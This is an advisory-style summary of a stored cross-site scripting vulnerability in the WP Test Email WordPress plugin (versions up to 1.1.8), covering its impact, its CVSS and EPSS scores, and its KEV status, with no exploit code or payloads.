The WP Test Email plugin for WordPress suffers from inadequate input sanitization and output escaping in its email logging feature, creating a stored cross‑site scripting flaw. Unauthenticated attackers can inject arbitrary scripts into the email logs, which are subsequently rendered in any page that displays those logs. When a legitimate user accesses an affected page, the injected script executes in the context of the user’s browser, potentially hijacking sessions, defacing content, or deferring further exploitation. The weakness is classified as CWE‑79, indicating a classic XSS vulnerability.

The vulnerability applies to the WP Test Email plugin by boopathi0001 for WordPress versions up to and including 1.1.8. Any installation of this plugin within that version range that retains email logs is susceptible. The CPE mapping reflects the relevant WordPress plugin offering in the affected package.

The CVSS score of 7.2 marks this problem as high yet not critical, while the EPSS score of less than 1% suggests a low probability of exploitation in the wild so far. The flaw is not listed in the CISA KEV catalog, meaning no known repeated exploitation has been documented recently. Attackers would need to identify a site that both hosts the vulnerable plugin and allows log storage or injection. Once compromised, the stored payload can affect any user who loads the page, yielding cross‑site session theft or defacement risks. Given the nature of the flaw, it is ideally mitigated before exploitation is observed, as the impact on user trust and site integrity is substantial when XSS succeeds.